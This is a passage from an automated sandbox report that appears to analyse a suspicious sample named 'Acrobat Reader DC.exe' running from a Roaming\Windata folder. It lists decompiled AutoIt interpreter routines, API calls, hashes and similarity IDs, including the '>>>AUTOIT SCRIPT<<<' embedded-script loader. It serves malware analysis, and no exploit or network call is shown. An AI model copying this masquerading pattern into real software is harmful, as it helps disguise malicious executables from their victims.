                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Window$CreateShow
                                  • String ID: AutoIt v3$edit
                                  • API String ID: 1584632944-3779509399
                                  • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                  • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                  • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                  • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040F250(short* __edx, char* __esi, void* _a4, short* _a8, intOrPtr _a12) {
                                  				int _v8;
                                  				void* _v12;
                                  				int* _t19;
                                  				long _t22;
                                  				signed int _t27;
                                  				int _t44;
                                  
                                  				 *__esi = 0;
                                  				_t19 = RegOpenKeyExW(_a4, __edx, 0, 1,  &_v12); // executed
                                  				if(_t19 != 0) {
                                  					return 0;
                                  				} else {
                                  					_t44 = _a12 + _a12;
                                  					_v8 = _t44;
                                  					_t22 = RegQueryValueExW(_v12, _a8, _t19, _t19, __esi,  &_v8); // executed
                                  					if(_t22 != 0) {
                                  						RegCloseKey(_v12);
                                  						return 0;
                                  					} else {
                                  						_t27 = _v8 >> 1;
                                  						_v8 = _t27;
                                  						if(_t27 >= _a12) {
                                  							 *((short*)(_t44 + __esi - 2)) = 0;
                                  						} else {
                                  							 *((short*)(__esi + _t27 * 2)) = 0;
                                  						}
                                  						RegCloseKey(_v12); // executed
                                  						return 1;
                                  					}
                                  				}
                                  			}










                                  APIs
                                  • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                  • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                  • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                  • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Close$OpenQueryValue
                                  • String ID: Control Panel\Mouse
                                  • API String ID: 1607946009-824357125
                                  • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                  • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                  • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                  • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 97%
                                  			E00414ABA(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                  				signed int _v8;
                                  				char* _v12;
                                  				signed int _v16;
                                  				signed int _v20;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				signed int _t82;
                                  				char _t89;
                                  				signed int _t96;
                                  				signed int _t98;
                                  				signed int _t101;
                                  				signed int _t104;
                                  				signed int _t108;
                                  				signed int _t109;
                                  				char* _t110;
                                  				signed int _t120;
                                  				signed int _t123;
                                  				signed int _t124;
                                  				signed int _t125;
                                  				signed int _t126;
                                  				void* _t127;
                                  
                                  				_t110 = _a4;
                                  				_t108 = _a8;
                                  				_t123 = _a12;
                                  				_v12 = _t110;
                                  				_v8 = _t108;
                                  				if(_t123 == 0 || _a16 == 0) {
                                  					L5:
                                  					return 0;
                                  				} else {
                                  					_t131 = _t110;
                                  					if(_t110 != 0) {
                                  						_t126 = _a20;
                                  						__eflags = _t126;
                                  						if(_t126 == 0) {
                                  							L9:
                                  							__eflags = _t108 - 0xffffffff;
                                  							if(_t108 != 0xffffffff) {
                                  								_t82 = E00412F40(_t110, 0, _t108);
                                  								_t127 = _t127 + 0xc;
                                  							}
                                  							__eflags = _t126;
                                  							if(__eflags == 0) {
                                  								goto L3;
                                  							} else {
                                  								__eflags = _a16 - (_t82 | 0xffffffff) / _t123;
                                  								if(__eflags > 0) {
                                  									goto L3;
                                  								}
                                  								L13:
                                  								_t124 = _t123 * _a16;
                                  								__eflags =  *(_t126 + 0xc) & 0x0000010c;
                                  								_v20 = _t124;
                                  								_t109 = _t124;
                                  								if(( *(_t126 + 0xc) & 0x0000010c) == 0) {
                                  									_v16 = 0x1000;
                                  								} else {
                                  									_v16 =  *((intOrPtr*)(_t126 + 0x18));
                                  								}
                                  								__eflags = _t124;
                                  								if(_t124 == 0) {
                                  									L40:
                                  									return _a16;
                                  								} else {
                                  									do {
                                  										__eflags =  *(_t126 + 0xc) & 0x0000010c;
                                  										if(( *(_t126 + 0xc) & 0x0000010c) == 0) {
                                  											L24:
                                  											__eflags = _t109 - _v16;
                                  											if(_t109 < _v16) {
                                  												_t89 = E0041D8F3(_t109, _t124, _t126); // executed
                                  												__eflags = _t89 - 0xffffffff;
                                  												if(_t89 == 0xffffffff) {
                                  													L45:
                                  													return (_t124 - _t109) / _a12;
                                  												}
                                  												__eflags = _v8;
                                  												if(_v8 == 0) {
                                  													L41:
                                  													__eflags = _a8 - 0xffffffff;
                                  													if(__eflags != 0) {
                                  														E00412F40(_a4, 0, _a8);
                                  													}
                                  													 *((intOrPtr*)(E00417F77(__eflags))) = 0x22;
                                  													L4:
                                  													E00417F25();
                                  													goto L5;
                                  												}
                                  												_v12 = _v12 + 1;
                                  												 *_v12 = _t89;
                                  												_t109 = _t109 - 1;
                                  												_t65 =  &_v8;
                                  												 *_t65 = _v8 - 1;
                                  												__eflags =  *_t65;
                                  												_v16 =  *((intOrPtr*)(_t126 + 0x18));
                                  												goto L39;
                                  											}
                                  											__eflags = _v16;
                                  											if(_v16 == 0) {
                                  												_t96 = 0x7fffffff;
                                  												__eflags = _t109 - 0x7fffffff;
                                  												if(_t109 <= 0x7fffffff) {
                                  													_t96 = _t109;
                                  												}
                                  											} else {
                                  												__eflags = _t109 - 0x7fffffff;
                                  												if(_t109 <= 0x7fffffff) {
                                  													_t50 = _t109 % _v16;
                                  													__eflags = _t50;
                                  													_t120 = _t50;
                                  													_t101 = _t109;
                                  												} else {
                                  													_t120 = 0x7fffffff % _v16;
                                  													_t101 = 0x7fffffff;
                                  												}
                                  												_t96 = _t101 - _t120;
                                  											}
                                  											__eflags = _t96 - _v8;
                                  											if(_t96 > _v8) {
                                  												goto L41;
                                  											} else {
                                  												_push(_t96);
                                  												_push(_v12);
                                  												_push(E00414139(_t126)); // executed
                                  												_t98 = E0041DFCC(_t109, _t124, _t126, __eflags); // executed
                                  												_t127 = _t127 + 0xc;
                                  												__eflags = _t98;
                                  												if(_t98 == 0) {
                                  													 *(_t126 + 0xc) =  *(_t126 + 0xc) | 0x00000010;
                                  													goto L45;
                                  												}
                                  												__eflags = _t98 - 0xffffffff;
                                  												if(_t98 == 0xffffffff) {
                                  													L44:
                                  													_t72 = _t126 + 0xc;
                                  													 *_t72 =  *(_t126 + 0xc) | 0x00000020;
                                  													__eflags =  *_t72;
                                  													goto L45;
                                  												}
                                  												_v12 = _v12 + _t98;
                                  												_t109 = _t109 - _t98;
                                  												_v8 = _v8 - _t98;
                                  												goto L39;
                                  											}
                                  										}
                                  										_t104 =  *(_t126 + 4);
                                  										__eflags = _t104;
                                  										if(__eflags == 0) {
                                  											goto L24;
                                  										}
                                  										if(__eflags < 0) {
                                  											goto L44;
                                  										}
                                  										_t125 = _t109;
                                  										__eflags = _t109 - _t104;
                                  										if(_t109 >= _t104) {
                                  											_t125 = _t104;
                                  										}
                                  										__eflags = _t125 - _v8;
                                  										if(_t125 > _v8) {
                                  											goto L41;
                                  										} else {
                                  											E0041E0C2(_v12, _v8,  *_t126, _t125);
                                  											 *(_t126 + 4) =  *(_t126 + 4) - _t125;
                                  											 *_t126 =  *_t126 + _t125;
                                  											_v12 = _v12 + _t125;
                                  											_t109 = _t109 - _t125;
                                  											_t127 = _t127 + 0x10;
                                  											_v8 = _v8 - _t125;
                                  											_t124 = _v20;
                                  										}
                                  										L39:
                                  										__eflags = _t109;
                                  									} while (_t109 != 0);
                                  									goto L40;
                                  								}
                                  							}
                                  						}
                                  						_t82 = (_t82 | 0xffffffff) / _t123;
                                  						__eflags = _a16 - _t82;
                                  						if(_a16 <= _t82) {
                                  							goto L13;
                                  						}
                                  						goto L9;
                                  					}
                                  					L3:
                                  					 *((intOrPtr*)(E00417F77(_t131))) = 0x16;
                                  					goto L4;
                                  				}
                                  			}


























                                  0x00000000
                                  0x00000000
                                  0x00414b66
                                  0x00000000
                                  0x00000000
                                  0x00414b6c
                                  0x00414b6e
                                  0x00414b70
                                  0x00414b72
                                  0x00414b72
                                  0x00414b74
                                  0x00414b77
                                  0x00000000
                                  0x00414b7d
                                  0x00414b86
                                  0x00414b8b
                                  0x00414b8e
                                  0x00414b90
                                  0x00414b93
                                  0x00414b95
                                  0x00414b98
                                  0x00414b9b
                                  0x00414b9b
                                  0x00414c28
                                  0x00414c28
                                  0x00414c28
                                  0x00000000
                                  0x00414b56
                                  0x00414b50
                                  0x00414b1f
                                  0x00414b05
                                  0x00414b07
                                  0x00414b0a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00414b0a
                                  0x00414ae2
                                  0x00414ae7
                                  0x00000000
                                  0x00414ae7

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                                  • String ID:
                                  • API String ID: 4048096073-0
                                  • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                  • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                  • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                  • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040F520(short* __eax, void* __esi, void* __fp0, intOrPtr _a4) {
                                  				intOrPtr _v36;
                                  				intOrPtr _v44;
                                  				char* _v48;
                                  				intOrPtr _v64;
                                  				intOrPtr _v68;
                                  				intOrPtr _v72;
                                  				char* _v84;
                                  				intOrPtr _v92;
                                  				struct tagOFNA _v96;
                                  				void* __ebx;
                                  				void* __edi;
                                  				int _t18;
                                  				void* _t24;
                                  				char* _t28;
                                  				short* _t33;
                                  				void* _t34;
                                  				void* _t38;
                                  
                                  				_t38 = __fp0;
                                  				_t34 = __esi;
                                  				_t33 = __eax;
                                  				 *((char*)(__esi + 3)) =  *0x4974e8;
                                  				_t37 =  *__eax;
                                  				if( *__eax == 0) {
                                  					_t31 =  &_v96;
                                  					 *_t28 = 1;
                                  					E00412F40( &_v96, 0, 0x58);
                                  					_v96 = 0x58;
                                  					_v48 = L"Run Script:";
                                  					_v92 = 0;
                                  					_v68 = _t33;
                                  					_v64 = 0x104;
                                  					_v84 = L"AutoIt script files (*.au3, *.a3x)";
                                  					_v72 = 1;
                                  					_v44 = 0x1804;
                                  					_v36 = L"au3";
                                  					_t18 = GetOpenFileNameW( &_v96);
                                  					__eflags = _t18;
                                  					if(_t18 != 0) {
                                  						goto L1;
                                  					}
                                  					return 0;
                                  				}
                                  				L1:
                                  				E00410120(_t33, _t33, _t31);
                                  				E004102B0(_t33, _t33, _t34); // executed
                                  				_t24 = E0040F570(_t33, _a4, _t33, _t37, _t38, _t34, E00410190(_t34, _t33, _t33), _a4); // executed
                                  				return _t24;
                                  			}




















                                  APIs
                                  • _memset.LIBCMT ref: 004295D4
                                  • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                    • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,0040F545,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,004A90E8,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,?,0040F545), ref: 0041013C
                                    • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                    • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                    • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                    • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                    • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                    • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen_memset
                                  • String ID: X$pWH
                                  • API String ID: 2873425188-941433119
                                  • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                  • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                  • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                  • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040EBD0(struct HINSTANCE__** __esi) {
                                  				struct HINSTANCE__* _t3;
                                  				_Unknown_base(*)()* _t4;
                                  
                                  				if(__esi[2] == 0) {
                                  					_t3 = LoadLibraryA("uxtheme.dll"); // executed
                                  					 *__esi = _t3;
                                  					if(_t3 != 0) {
                                  						_t4 = GetProcAddress(_t3, "IsThemeActive");
                                  						__esi[2] = _t4;
                                  						return _t4;
                                  					}
                                  				}
                                  				return _t3;
                                  			}





                                  APIs
                                  • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                  • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: IsThemeActive$uxtheme.dll
                                  • API String ID: 2574300362-3542929980
                                  • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                  • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                  • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                  • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 63%
                                  			E0040F570(void* __eax, void* __ecx, void* __edx, void* __eflags, signed int __fp0, intOrPtr _a4, void* _a8, signed int _a12) {
                                  				signed int _v12;
                                  				signed int _v16;
                                  				intOrPtr _v20;
                                  				signed int _v24;
                                  				short _v26;
                                  				short _v28;
                                  				signed int _v32;
                                  				signed int _v36;
                                  				char _v48;
                                  				signed int _v52;
                                  				signed int _v56;
                                  				signed int _v60;
                                  				char _v64;
                                  				char _v80;
                                  				char _v96;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* _t97;
                                  				signed int* _t99;
                                  				signed int* _t108;
                                  				signed int* _t119;
                                  				signed int* _t120;
                                  				signed int* _t122;
                                  				intOrPtr _t129;
                                  				void* _t130;
                                  				signed int _t131;
                                  				signed int _t142;
                                  				signed int* _t146;
                                  				signed int _t157;
                                  				signed int _t159;
                                  				void* _t160;
                                  				signed int _t162;
                                  				signed int _t164;
                                  				signed int _t170;
                                  				signed int _t174;
                                  				signed int _t178;
                                  				signed int _t179;
                                  				signed int _t181;
                                  				void* _t184;
                                  				intOrPtr _t195;
                                  				intOrPtr _t202;
                                  				signed int _t203;
                                  				void* _t209;
                                  				signed int _t212;
                                  				signed int _t215;
                                  				void* _t217;
                                  				void* _t218;
                                  
                                  				_t224 = __fp0;
                                  				_t184 = __edx;
                                  				_t209 = __eax;
                                  				_t97 = E0040F760(__ecx,  &_v48, __eflags, __eax); // executed
                                  				if(_t97 == 0) {
                                  					_t164 =  &_v48;
                                  					_t99 = E004528BD(__eflags, _t164, L">>>AUTOIT SCRIPT<<<",  &_a8,  &_a12); // executed
                                  					__eflags = _t99;
                                  					if(__eflags == 0) {
                                  						_t101 =  *_a8;
                                  						_t202 = _a4;
                                  						_t14 = _t101 + 1; // 0x2
                                  						_t210 = _t14;
                                  						 *((intOrPtr*)(_t202 + 0x10)) =  *_a8;
                                  						_v28 = _t164 | 0xffffffff;
                                  						_t157 = 0;
                                  						_a12 = 4;
                                  						_v64 = 0x485a84;
                                  						_v60 = 0;
                                  						_v56 = 0;
                                  						_v52 = 0;
                                  						_t170 = ( ~(0 | __eflags > 0x00000000) | _t210 * 0x00000010) + 4;
                                  						_push( ~(0 | __eflags > 0x00000000) | _t170);
                                  						_t108 = E004115D7(_t202, _t210, __eflags);
                                  						_t218 = _t217 + 4;
                                  						__eflags = _t108;
                                  						if(_t108 != 0) {
                                  							_t30 =  &(_t108[1]); // 0x4
                                  							_t170 = _t30;
                                  							 *_t108 = _t210;
                                  							_v24 = _t170;
                                  							E00410CA0(_t210, 0x4023e8, _t170, 0x10);
                                  							_t157 = _v24;
                                  						}
                                  						_t171 = _t170 | 0xffffffff;
                                  						 *((intOrPtr*)(_t202 + 0x44)) = _t157;
                                  						_v26 = _t170 | 0xffffffff;
                                  						__eflags =  *((intOrPtr*)(_t202 + 0x10)) - 1;
                                  						if( *((intOrPtr*)(_t202 + 0x10)) < 1) {
                                  							L29:
                                  							E00413748(_a8); // executed
                                  							E00431E58( &_v48); // executed
                                  							E0040EDC0( &_v64, _t202, _t210);
                                  							E0044B469(__eflags,  &_v36);
                                  							return 1;
                                  						}
                                  						_v20 = 1;
                                  						_v24 = 0x10;
                                  						do {
                                  							E0040D530( &_v64, _t171);
                                  							goto L12;
                                  							do {
                                  								while(1) {
                                  									L12:
                                  									_t174 = _a12;
                                  									_t159 =  *(_t174 + _a8) & 0x000000ff;
                                  									_t203 = _t159;
                                  									_a12 = _t174 + 1;
                                  									E00402710(_t203,  &_v36, _t224);
                                  									_t119 = E0043259D( &_v36);
                                  									__eflags = _t119;
                                  									if(_t119 != 0) {
                                  										break;
                                  									}
                                  									_t171 =  &_v36;
                                  									_t120 = E0043257B( &_v36);
                                  									__eflags = _t120;
                                  									if(_t120 == 0) {
                                  										_t122 = E00432559( &_v36);
                                  										__eflags = _t122;
                                  										if(_t122 == 0) {
                                  											__eflags = E004325BE( &_v36);
                                  											if(__eflags == 0) {
                                  												goto L27;
                                  											}
                                  											_t171 =  &_a12;
                                  											_v16 = _t159;
                                  											_t130 = E00444AF8(__eflags, _a8,  &_a12); // executed
                                  											_t160 = _t130;
                                  											_t131 = _t203;
                                  											__eflags = _t131 - 0x31;
                                  											if(__eflags != 0) {
                                  												__eflags = _t131 - 0x30;
                                  												if(__eflags != 0) {
                                  													_push(_t160);
                                  													__eflags = _t131 - 0x37;
                                  													if(__eflags != 0) {
                                  														_push( &_v36); // executed
                                  														E0044B41C( &_a12, _t203,  &_v36, __eflags); // executed
                                  														L26:
                                  														_push(_t160);
                                  														E004111DC();
                                  														_t159 = _v16;
                                  														_t218 = _t218 + 4;
                                  														goto L27;
                                  													}
                                  													_push(_a4);
                                  													E0044C7DD( &_a12, _t203);
                                  													_push(_t160);
                                  													E004111DC();
                                  													_t218 = _t218 + 4;
                                  													continue;
                                  												}
                                  												E00401B10(_t160,  &_v96, __eflags);
                                  												_v12 = E00444A7E(__eflags,  &_v96);
                                  												E00402250( &_v96);
                                  												E00402710(0,  &_v36, _t224);
                                  												_t171 = _v12;
                                  												_v36 = _v12;
                                  												goto L26;
                                  											}
                                  											_t215 =  &_v80;
                                  											E00401B10(_t160, _t215, __eflags);
                                  											_t142 = E00444ABD(_a4, _t215);
                                  											_t171 = _t215;
                                  											_v12 = _t142;
                                  											E00402250(_t215);
                                  											E00402710(1,  &_v36, _t224);
                                  											_v36 = _v12;
                                  											goto L26;
                                  										}
                                  										_t178 = _a12;
                                  										_t195 = _a8;
                                  										_t224 =  *(_t178 + _t195);
                                  										_t171 = _t178 + 8;
                                  										_v36 =  *(_t178 + _t195);
                                  										_a12 = _t178 + 8;
                                  										goto L27;
                                  									}
                                  									_t179 = _a12;
                                  									_t146 = _t179 + _a8;
                                  									_a12 = _t179 + 8;
                                  									_t171 =  *_t146;
                                  									_v36 =  *_t146;
                                  									_v32 = _t146[1];
                                  									goto L27;
                                  								}
                                  								_t181 = _a12;
                                  								_t171 = _t181 + 4;
                                  								_a12 = _t181 + 4;
                                  								_v36 =  *(_t181 + _a8);
                                  								L27:
                                  								E00402780( &_v36, _t171,  &_v64);
                                  								__eflags = _t159 - 0x7f;
                                  							} while (_t159 != 0x7f);
                                  							_t212 = _v24;
                                  							_t202 = _a4;
                                  							E004022D0( *((intOrPtr*)(_t202 + 0x44)) + _t212,  &_v64); // executed
                                  							_t129 = _v20 + 1;
                                  							_t210 = _t212 + 0x10;
                                  							_v20 = _t129;
                                  							_v24 = _t212 + 0x10;
                                  							__eflags = _t129 -  *((intOrPtr*)(_t202 + 0x10));
                                  						} while (_t129 <=  *((intOrPtr*)(_t202 + 0x10)));
                                  						goto L29;
                                  					}
                                  					E00431E58( &_v48);
                                  					L6:
                                  					E00434034( *((intOrPtr*)(_a4 + 0x48)),  *(_a4 + 3) & 0x000000ff);
                                  					return 0;
                                  				}
                                  				_t162 = _a12;
                                  				if( *_t162 == 4) {
                                  					goto L6;
                                  				}
                                  				 *_t162 = 2;
                                  				return E004033C0(_t184, __fp0, _a4, _t209, _a8, _t209, 0x484ea8, 0);
                                  			}




















































                                  APIs
                                  • _free.LIBCMT ref: 004295A0
                                    • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                    • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                    • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                    • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                    • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                    • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_wcscat_wcscpy
                                  • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe
                                  • API String ID: 2744521063-368524663
                                  • Opcode ID: 880aae0f25a8000fe6588a260fc2cee1b6e9e9d2e5696b5ac2ca62059b09666c
                                  • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                  • Opcode Fuzzy Hash: 880aae0f25a8000fe6588a260fc2cee1b6e9e9d2e5696b5ac2ca62059b09666c
                                  • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 67%
                                  			E00401B10(void* __edi, intOrPtr* __esi, void* __eflags) {
                                  				intOrPtr _t14;
                                  				intOrPtr _t15;
                                  				signed int _t16;
                                  				intOrPtr _t18;
                                  				intOrPtr* _t20;
                                  				void* _t34;
                                  				intOrPtr* _t35;
                                  				signed int _t41;
                                  
                                  				_t35 = __esi;
                                  				_t34 = __edi;
                                  				_t14 = E004111C1(__edi);
                                  				 *((intOrPtr*)(__esi + 4)) = _t14;
                                  				_t15 = _t14 + 1;
                                  				 *((intOrPtr*)(__esi + 8)) = _t15;
                                  				if(_t15 == 0) {
                                  					_t16 = 8;
                                  				} else {
